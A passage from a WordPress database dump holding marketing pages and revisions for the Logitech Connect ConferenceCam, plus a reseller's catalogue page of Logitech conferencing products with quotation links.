CONFERENCING</h4>\r\nDialing into an audio conference? Already connected on your smartphone? Simply pair Connect via either BluetoothÂ® or NFC to enjoy outstanding audio clarity, volume, and dynamic range. Connect features two omnidirectional microphones and 360Â° wideband audio so everyone can hear and be heard.\r\n<h4>PORTABLE POWER</h4>\r\nDesigned for convenient portability, Connect boasts an internal, rechargeable battery that can run video calls for up to 3 hours, and audio calls for up to 15 hours. Or, power Connect with the included AC power supply: swappable regional plugs (included) make it easy to to power and charge around the world.\r\n<h4>USB PLUG-AND-PLAY CONNECTIVITY</h4>\r\nWith no special software, training, or maintenance required, launching an enterprise-quality videoconference has never been easier. Simply plug Connect into your PC, Mac, or Chromebook: it works as both a webcam and an audio device with your video conferencing software.\r\n<h4>SAFE AND SECURE</h4>\r\nConnectâ€™s remote control docks over the lens, providing an extra level of privacy. And when you want Connect to stay put, the Kensington security slot offers simple protection from theft.','Logitech CONNECT','','publish','closed','closed','','logitech-connect','','','2019-03-04 11:26:27','2019-03-04 03:26:27','',0,'https://bintara.com.my/?page_id=2940',0,'page','',0),(2941,1,'2019-03-04 10:27:27','2019-03-04 02:27:27','','Logitech CONNECT','','inherit','closed','closed','','2940-revision-v1','','','2019-03-04 10:27:27','2019-03-04 02:27:27','',2940,'https://bintara.com.my/blog/2019/03/04/2940-revision-v1/',0,'revision','',0),(2942,1,'2019-03-04 10:29:19','2019-03-04 02:29:19','','conferencecam-connect (1)','','inherit','closed','closed','','conferencecam-connect-1','','','2019-03-04 10:29:19','2019-03-04 02:29:19','',2940,'https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.png',0,'attachment','image/png',0),(2943,1,'2019-03-04 10:31:11','2019-03-04 02:31:11','','conferencecam-connect','','inherit','closed','closed','','conferencecam-connect-2','','','2019-03-04 10:31:11','2019-03-04 02:31:11','',2940,'https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect.jpg',0,'attachment','image/jpeg',0),(2944,1,'2019-03-04 10:32:14','2019-03-04 02:32:14','<p>CONNECT</p><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p><ul><li>Superior video and audio with a compact, 76 mm footprint</li><li>Works with your meeting and video conferencing applications</li><li>Plug-free mobility with rechargeable battery</li></ul>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.png 687w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h2>FLEXIBLE VIDEO FOR THE ANYWHERE WORKPLACE</h2><p>Simplify video conferencing so anyone can set it up and run a meeting anywhere. Make it affordable so you can outfit every conference room with video. Designed for huddle rooms and home offices, Logitech Connect is also compact and mobile so you can take it throughout the workplace and around the world. Connect is always ready for your next video conference call.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>PERFECT FOR SMALL SPACES</h3><p>Logitech Connect goes beyond its award winning design â€” video conferencing so simple to use that anyone can set it up and so affordable you can enable every meeting room with video. Designed for tabletop placement and small spaces, this video conference solution offers a generous 90Â° field-of-view with pan and tilt, 4x zoom, and razor-sharp optics making it easy to see everyone in the room.</p><h3>COMPACT ALL-IN-ONE DESIGN</h3><p>Take video conferencing on the go. Carry Connect from meeting to meeting, or pack it when traveling so you never miss the opportunity to meet face to face. With a tabletop footprint just 3 inches (75 mm) across, Connect fits just about anywhere. Even the handheld remote is designed for easy portability, docking as a lens cover so you wonâ€™t lose it in your bag.</p>https://youtu.be/Z9jk_qlVlTY','Logitech CONNECT','','inherit','closed','closed','','2940-revision-v1','','','2019-03-04 10:32:14','2019-03-04 02:32:14','',2940,'https://bintara.com.my/blog/2019/03/04/2940-revision-v1/',0,'revision','',0),(2945,1,'2019-03-04 10:33:40','2019-03-04 02:33:40','','conferencecam-connect (1)','','inherit','closed','closed','','conferencecam-connect-1-2','','','2019-03-04 10:33:40','2019-03-04 02:33:40','',2940,'https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.jpg',0,'attachment','image/jpeg',0),(2946,1,'2019-03-04 10:34:42','2019-03-04 02:34:42','','conferencecam-connect (2)','','inherit','closed','closed','','conferencecam-connect-2-2','','','2019-03-04 10:34:42','2019-03-04 02:34:42','',2940,'https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2.jpg',0,'attachment','image/jpeg',0),(2952,1,'2019-03-04 11:16:16','2019-03-04 03:16:16','<h2>CONNECT</h2>\r\nPortable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go\r\n<ul>\r\n 	<li>Superior video and audio with a compact, 76 mm footprint</li>\r\n 	<li>Works with your meeting and video conferencing applications</li>\r\n 	<li>Plug-free mobility with rechargeable battery</li>\r\n</ul>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x262.png\" sizes=\"(max-width: 300px) 100vw, 300px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.png 687w\" alt=\"\" width=\"300\" height=\"262\" />\r\n<h2>FLEXIBLE VIDEO FOR THE ANYWHERE WORKPLACE</h2>\r\nSimplify video conferencing so anyone can set it up and run a meeting anywhere. Make it affordable so you can outfit every conference room with video. Designed for huddle rooms and home offices, Logitech Connect is also compact and mobile so you can take it throughout the workplace and around the world. Connect is always ready for your next video conference call.\r\n<h4>KEY FEATURES</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h3>PERFECT FOR SMALL SPACES</h3>\r\nLogitech Connect goes beyond its award winning design â€” video conferencing so simple to use that anyone can set it up and so affordable you can enable every meeting room with video. Designed for tabletop placement and small spaces, this video conference solution offers a generous 90Â° field-of-view with pan and tilt, 4x zoom, and razor-sharp optics making it easy to see everyone in the room.\r\n<h3>COMPACT ALL-IN-ONE DESIGN</h3>\r\nTake video conferencing on the go. Carry Connect from meeting to meeting, or pack it when traveling so you never miss the opportunity to meet face to face. With a tabletop footprint just 3 inches (75 mm) across, Connect fits just about anywhere. Even the handheld remote is designed for easy portability, docking as a lens cover so you wonâ€™t lose it in your bag.\r\n\r\nhttps://youtu.be/Z9jk_qlVlTY\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h3>COMPATIBLE WITH MOST VC APPS</h3>\r\nConnect offers a plug-and-play USB connection to Windows and Mac computers and Chromebooksâ„¢, and is certified for Skype for Business, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom.\r\n<h3>PREMIUM CAMERA LENS</h3>\r\nConnect features a premium glass lens for maximum clarity. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in. Easily protect the lens from dust and scratches by docking the magnetic remote control.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h4>ADDITIONAL FEATURES</h4>\r\n<h4>EASY AUDIO CONFERENCING</h4>\r\nDialing into an audio conference? Already connected on your smartphone? Simply pair Connect via either BluetoothÂ® or NFC to enjoy outstanding audio clarity, volume, and dynamic range. Connect features two omnidirectional microphones and 360Â° wideband audio so everyone can hear and be heard.\r\n<h4>PORTABLE POWER</h4>\r\nDesigned for convenient portability, Connect boasts an internal, rechargeable battery that can run video calls for up to 3 hours, and audio calls for up to 15 hours. Or, power Connect with the included AC power supply: swappable regional plugs (included) make it easy to to power and charge around the world.\r\n<h4>USB PLUG-AND-PLAY CONNECTIVITY</h4>\r\nWith no special software, training, or maintenance required, launching an enterprise-quality videoconference has never been easier. Simply plug Connect into your PC, Mac, or Chromebook: it works as both a webcam and an audio device with your video conferencing software.\r\n<h4>SAFE AND SECURE</h4>\r\nConnectâ€™s remote control docks over the lens, providing an extra level of privacy. And when you want Connect to stay put, the Kensington security slot offers simple protection from theft.','Logitech CONNECT','','inherit','closed','closed','','2940-revision-v1','','','2019-03-04 11:16:16','2019-03-04 03:16:16','',2940,'https://bintara.com.my/blog/2019/03/04/2940-revision-v1/',0,'revision','',0),(2947,1,'2019-03-04 10:38:02','2019-03-04 02:38:02','<h2>CONNECT</h2><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p><ul><li>Superior video and audio with a compact, 76 mm footprint</li><li>Works with your meeting and video conferencing applications</li><li>Plug-free mobility with rechargeable battery</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>FLEXIBLE VIDEO FOR THE ANYWHERE WORKPLACE</h2><p>Simplify video conferencing so anyone can set it up and run a meeting anywhere. Make it affordable so you can outfit every conference room with video. Designed for huddle rooms and home offices, Logitech Connect is also compact and mobile so you can take it throughout the workplace and around the world. Connect is always ready for your next video conference call.</p>		\n			<h4>KEY FEATURES</h4>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>PERFECT FOR SMALL SPACES</h3><p>Logitech Connect goes beyond its award winning design â€” video conferencing so simple to use that anyone can set it up and so affordable you can enable every meeting room with video. Designed for tabletop placement and small spaces, this video conference solution offers a generous 90Â° field-of-view with pan and tilt, 4x zoom, and razor-sharp optics making it easy to see everyone in the room.</p><h3>COMPACT ALL-IN-ONE DESIGN</h3><p>Take video conferencing on the go. Carry Connect from meeting to meeting, or pack it when traveling so you never miss the opportunity to meet face to face. With a tabletop footprint just 3 inches (75 mm) across, Connect fits just about anywhere. Even the handheld remote is designed for easy portability, docking as a lens cover so you wonâ€™t lose it in your bag.</p>https://youtu.be/Z9jk_qlVlTY		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>COMPATIBLE WITH MOST VC APPS</h3><p>Connect offers a plug-and-play USB connection to Windows and Mac computers and Chromebooksâ„¢, and is certified for Skype for Business, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom.</p><h3>PREMIUM CAMERA LENS</h3><p>Connect features a premium glass lens for maximum clarity. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in. Easily protect the lens from dust and scratches by docking the magnetic remote control.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>EASY AUDIO CONFERENCING</h4><p>Dialing into an audio conference? Already connected on your smartphone? Simply pair Connect via either BluetoothÂ® or NFC to enjoy outstanding audio clarity, volume, and dynamic range. Connect features two omnidirectional microphones and 360Â° wideband audio so everyone can hear and be heard.</p><h4>PORTABLE POWER</h4><p>Designed for convenient portability, Connect boasts an internal, rechargeable battery that can run video calls for up to 3 hours, and audio calls for up to 15 hours. Or, power Connect with the included AC power supply: swappable regional plugs (included) make it easy to to power and charge around the world.</p><h4>USB PLUG-AND-PLAY CONNECTIVITY</h4><p>With no special software, training, or maintenance required, launching an enterprise-quality videoconference has never been easier. Simply plug Connect into your PC, Mac, or Chromebook: it works as both a webcam and an audio device with your video conferencing software.</p><h4>SAFE AND SECURE</h4><p>Connectâ€™s remote control docks over the lens, providing an extra level of privacy. And when you want Connect to stay put, the Kensington security slot offers simple protection from theft.</p>','Logitech CONNECT','','inherit','closed','closed','','2940-revision-v1','','','2019-03-04 10:38:02','2019-03-04 02:38:02','',2940,'https://bintara.com.my/blog/2019/03/04/2940-revision-v1/',0,'revision','',0),(2948,1,'2019-03-04 11:24:36','2019-03-04 03:24:36','<h2>CONNECT</h2>\r\nPortable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go\r\n<ul>\r\n 	<li>Superior video and audio with a compact, 76 mm footprint</li>\r\n 	<li>Works with your meeting and video conferencing applications</li>\r\n 	<li>Plug-free mobility with rechargeable battery</li>\r\n</ul>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x262.png\" sizes=\"(max-width: 300px) 100vw, 300px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.png 687w\" alt=\"\" width=\"300\" height=\"262\" />\r\n<h2>FLEXIBLE VIDEO FOR THE ANYWHERE WORKPLACE</h2>\r\nSimplify video conferencing so anyone can set it up and run a meeting anywhere. Make it affordable so you can outfit every conference room with video. Designed for huddle rooms and home offices, Logitech Connect is also compact and mobile so you can take it throughout the workplace and around the world. Connect is always ready for your next video conference call.\r\n<h4>KEY FEATURES</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h3>PERFECT FOR SMALL SPACES</h3>\r\nLogitech Connect goes beyond its award winning design â€” video conferencing so simple to use that anyone can set it up and so affordable you can enable every meeting room with video. Designed for tabletop placement and small spaces, this video conference solution offers a generous 90Â° field-of-view with pan and tilt, 4x zoom, and razor-sharp optics making it easy to see everyone in the room.\r\n<h3>COMPACT ALL-IN-ONE DESIGN</h3>\r\nTake video conferencing on the go. Carry Connect from meeting to meeting, or pack it when traveling so you never miss the opportunity to meet face to face. With a tabletop footprint just 3 inches (75 mm) across, Connect fits just about anywhere. Even the handheld remote is designed for easy portability, docking as a lens cover so you wonâ€™t lose it in your bag.\r\n\r\nhttps://youtu.be/Z9jk_qlVlTY\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h3>COMPATIBLE WITH MOST VC APPS</h3>\r\nConnect offers a plug-and-play USB connection to Windows and Mac computers and Chromebooksâ„¢, and is certified for Skype for Business, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom.\r\n<h3>PREMIUM CAMERA LENS</h3>\r\nConnect features a premium glass lens for maximum clarity. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in. Easily protect the lens from dust and scratches by docking the magnetic remote control.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h4>ADDITIONAL FEATURES</h4>\r\n<h4>EASY AUDIO CONFERENCING</h4>\r\nDialing into an audio conference? Already connected on your smartphone? Simply pair Connect via either BluetoothÂ® or NFC to enjoy outstanding audio clarity, volume, and dynamic range. Connect features two omnidirectional microphones and 360Â° wideband audio so everyone can hear and be heard.\r\n<h4>PORTABLE POWER</h4>\r\nDesigned for convenient portability, Connect boasts an internal, rechargeable battery that can run video calls for up to 3 hours, and audio calls for up to 15 hours. Or, power Connect with the included AC power supply: swappable regional plugs (included) make it easy to to power and charge around the world.\r\n<h4>USB PLUG-AND-PLAY CONNECTIVITY</h4>\r\nWith no special software, training, or maintenance required, launching an enterprise-quality videoconference has never been easier. Simply plug Connect into your PC, Mac, or Chromebook: it works as both a webcam and an audio device with your video conferencing software.\r\n<h4>SAFE AND SECURE</h4>\r\nConnectâ€™s remote control docks over the lens, providing an extra level of privacy. And when you want Connect to stay put, the Kensington security slot offers simple protection from theft.','Logitech CONNECT','','inherit','closed','closed','','2940-autosave-v1','','','2019-03-04 11:24:36','2019-03-04 03:24:36','',2940,'https://bintara.com.my/blog/2019/03/04/2940-autosave-v1/',0,'revision','',0),(2953,1,'2019-03-04 11:25:44','2019-03-04 03:25:44','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-meetup/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-connect/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BRIO</h3><p>4K Ultra HD webcam with RightLightâ„¢ 3 with HDR</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C930e</h3><p>Business webcam with a wide field of view and HD digital zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C925e</h3><p>Affordable 1080p HD webcam with integrated privacy shade</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech B525</h3><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>HEADSETS</h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech H570e Headset</h3><p>Comfortable, affordable, and built to last</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<h2>VIDEO COLLABORATION ACCESSORIES</h2>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>SMARTDOCK EXTENDER BOX</h3><p>Connectivity options for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" 